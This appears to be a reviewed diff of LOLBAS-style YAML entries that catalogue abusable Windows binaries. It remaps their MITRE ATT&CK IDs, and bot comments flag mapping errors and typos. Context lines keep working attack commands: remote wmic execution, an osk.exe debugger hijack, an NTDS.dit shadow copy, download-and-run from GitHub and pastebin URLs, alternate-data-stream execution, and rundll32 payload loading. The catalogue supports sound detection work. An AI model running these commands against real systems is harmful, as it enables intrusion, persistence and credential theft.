|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\runonce.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Execute binary file hidden inside an alternate data stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\sc.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1053 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1053 | ||||
|     OperatingSystem: Windows | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\schtasks.exe | ||||
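Review bot: T1053 is left at the parent technique here while the rest of this commit moves entries to sub-techniques (T1218.011, T1564.004, T1548.002); `schtasks.exe` maps directly to T1053.005 (Scheduled Task/Job: Scheduled Task). The `OperatingSystem: Windows` value is also vaguer than the versioned lists used in the neighbouring files.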
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" | ||||
|     Description: Executes calc.cmde from remote server | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\scriptrunner.exe | ||||
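Review bot: the `Description: Executes calc.cmde from remote server` context line has a typo, `calc.cmde` for `calc.cmd`, the file named in the command directly above it; since the entry is already being modified, fix it in the same commit.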
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218/ | ||||
|     OperatingSystem: Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything | ||||
|     Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218/ | ||||
|     OperatingSystem: Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\SettingSyncHost.exe | ||||
|   | ||||
| @@ -10,12 +10,11 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\stordiag.exe | ||||
|   - Path: c:\windows\syswow64\stordiag.exe | ||||
| Detection:  | ||||
| Detection: | ||||
|   - IOC: systeminfo.exe, fltmc.exe or schtasks.exe being executed outside of their normal path of c:\windows\system32\ or c:\windows\syswow64\ | ||||
| Resources: | ||||
|   - Link: https://twitter.com/eral4m/status/1451112385041911809 | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\SyncAppvPublishingServer.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 2004 | ||||
|   - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" | ||||
|     Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 1909 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\ttdinject.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 1809 and newer | ||||
|   - Command: TTTracer.exe -dumpFull -attach pid | ||||
|     Description: Dumps process using tttracer.exe. Requires administrator privileges | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Dump | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1003 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1003 | ||||
|     OperatingSystem: Windows 10 1809 and newer | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\tttracer.exe | ||||
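Review bot: `TTTracer.exe -dumpFull -attach pid` keeps the parent T1003 while this commit otherwise prefers sub-techniques. If the catalogued use is dumping LSASS, T1003.001 (LSASS Memory) is the specific id; for an arbitrary-process dump the parent is acceptable, but the choice should be deliberate and stated, because the `Category: Dump` entries are the ones detection engineers key on.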
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1127/ | ||||
|     OperatingSystem: Windows 10,7 | ||||
|   - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb | ||||
|     Description: Description of the second command | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1127/ | ||||
|     OperatingSystem: Windows 10,7 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | ||||
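Review bot: `Description: Description of the second command` is template placeholder text left in the entry for `vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb`; it should describe what the command does (compiling the referenced .vb source with the Visual Basic assembly referenced) before this file is closed out again.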
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\verclsid.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Program Files\Windows Mail\wab.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe process call create calc | ||||
|     Description: Execute calc from wmic | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" | ||||
|     Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well. | ||||
| @@ -26,7 +24,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" | ||||
|     Description: Execute evil.exe on the remote system. | ||||
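Review bot: the T1218 in this hunk belongs to the `reg.exe add ... Image File Execution Options\osk.exe ... /v Debugger` command, which establishes an IFEO debugger; ATT&CK catalogues that as T1546.012 (Event Triggered Execution: Image File Execution Options Injection), and T1218 only describes the wmic wrapper around it. Since the sprint is about realignment, T1546.012 is the id a defender would expect to find on this entry.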
| @@ -34,7 +31,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" | ||||
|     Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm. | ||||
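Review bot: T1218 for `wmic.exe /node:"192.168.0.1" process call create "evil.exe"` misses the technique ATT&CK uses for exactly this command, T1047 (Windows Management Instrumentation), which also covers the remote-execution case; the other `process call create` entries in this file would take the same id. If T1218 is kept deliberately as the generic proxy-execution bucket, say so in the commit message so the next realignment pass does not revisit it.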
| @@ -42,7 +38,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" | ||||
|     Description: Create a volume shadow copy of NTDS.dit that can be copied. | ||||
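Review bot: the T1218 in this hunk is attached to the `at 9:00PM c:\GoogleUpdate.exe` command, which creates a scheduled job; the specific id is T1053.002 (Scheduled Task/Job: At). Same remark as for schtasks above: the rest of the commit moves to sub-techniques, so leaving this one at a parent that does not even describe scheduling looks like an oversight.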
| @@ -50,7 +45,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" | ||||
|     Description: Create a volume shadow copy of NTDS.dit that can be copied. | ||||
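Review bot: two issues in this hunk. The T1218 belongs to the `vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit` command, where T1003.003 (OS Credential Dumping: NTDS) is the specific technique. And the trailing `Description: Create a volume shadow copy of NTDS.dit that can be copied.` is a copy-paste of the previous entry's text attached to the `process get brief /format:"https://.../Wmic_calc.xsl"` command; it should instead say that the command executes the script embedded in the remote XSL stylesheet, as the next entry's description already does.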
| @@ -58,7 +52,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" | ||||
|     Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. | ||||
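Review bot: the `/format:` XSL entries (the https one whose id is in this hunk and the `\\127.0.0.1\c$\Tools\pocremote.xsl` one that follows) are the canonical example of T1220 (XSL Script Processing), which ATT&CK lists separately from T1218; consider using it here. Also, `stylsheet` in the `Description:` context line is a typo for `stylesheet`.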
| @@ -66,7 +59,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\wbem\wmic.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218/ | ||||
|     OperatingSystem: Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\WorkFolders.exe | ||||
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Execute hidden code to evade defensive counter measures | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js | ||||
|     Description: Download and execute script stored in an alternate data stream | ||||
|     Usecase: Execute hidden code to evade defensive counter measures | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\wscript.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. | ||||
|     Category: UAC bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1088 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1088 | ||||
|     MitreID: T1548.002 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\wsreset.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Execute dll via attach/detach methods | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\wuauclt.exe | ||||
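Review bot: T1218.011 is the Rundll32 sub-technique, but `wuauclt.exe` loading a DLL via its attach/detach methods is not rundll32; the parent T1218 (which this commit keeps for other non-rundll32 proxies such as verclsid and wab) is the accurate mapping here. The advpack.dll and ieadvpack.dll entries below are fine with T1218.011 because they are invoked through rundll32.exe.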
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} | ||||
|     Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM | ||||
|     Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file. | ||||
| @@ -26,7 +24,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\xwizard.exe | ||||
|   | ||||
| @@ -9,39 +9,36 @@ Commands: | ||||
|     Usecase: Run local or remote script(let) code through INF file specification. | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows | ||||
|   - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, | ||||
|     Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). | ||||
|     Usecase: Run local or remote script(let) code through INF file specification. | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows | ||||
|   - Command: rundll32.exe advpack.dll,RegisterOCX test.dll | ||||
|     Description: Launch a DLL payload by calling the RegisterOCX function. | ||||
|     Usecase: Load a DLL payload. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows | ||||
|   - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe | ||||
|     Description: Launch an executable by calling the RegisterOCX function. | ||||
|     Usecase: Run an executable payload. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows | ||||
|   - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" | ||||
|     Description: Launch command line by calling the RegisterOCX function. | ||||
|     Usecase: Run an executable payload. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\advpack.dll | ||||
|   - Path: c:\windows\syswow64\advpack.dll | ||||
|   | ||||
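Review bot: the T1085 to T1218.011 remap is applied uniformly to all five `advpack.dll` entries, but the last one (`RegisterOCX "cmd.exe /c calc.exe"`) keeps `OperatingSystem: Windows 10` while the other four say `Windows`; if that form was only verified on Windows 10 the difference is fine, otherwise align it with the rest while the entry is being touched.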
| @@ -9,39 +9,34 @@ Commands: | ||||
|     Usecase: Run local or remote script(let) code through INF file specification. | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows | ||||
|   - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, | ||||
|     Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). | ||||
|     Usecase: Run local or remote script(let) code through INF file specification. | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows | ||||
|   - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll | ||||
|     Description: Launch a DLL payload by calling the RegisterOCX function. | ||||
|     Usecase: Load a DLL payload. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows | ||||
|   - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe | ||||
|     Description: Launch an executable by calling the RegisterOCX function. | ||||
|     Usecase: Run an executable payload. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|   - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" | ||||
|     Description: Launch command line by calling the RegisterOCX function. | ||||
|     Usecase: Run an executable payload. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\ieadvpack.dll | ||||
|   - Path: c:\windows\syswow64\ieadvpack.dll | ||||
|   | ||||
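Review bot: the last two `ieadvpack.dll` entries (`RegisterOCX calc.exe` and `RegisterOCX "cmd.exe /c calc.exe"`) have no `OperatingSystem:` line at all, so `MitreID: T1218.011` is followed directly by the next `- Command:` and by `Full_Path:`; the parallel `advpack.dll` entries in the previous hunk carry `OperatingSystem: Windows` and `Windows 10` for the same commands, so add the missing field here to keep the two files and the schema uniform.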
| @@ -9,8 +9,7 @@ Commands: | ||||
|     UseCase: Load an executable payload by calling a .url file with or without quotes.  The .url file extension can be renamed. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MItreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\ieframe.dll | ||||
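Review bot: the removed key was spelled `MItreLink` (capital I), so this hunk incidentally retires a key that a case-sensitive parser would never have matched; the retained `UseCase:` at the top of the hunk has the same problem, since every other entry in this diff spells it `Usecase:`, and should be normalized in the same commit.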
| @@ -29,4 +28,4 @@ Acknowledgement: | ||||
|     Handle: '@bohops' | ||||
|   - Person: Adam | ||||
|     Handle: '@hexacorn' | ||||
| --- | ||||
| --- | ||||
|   | ||||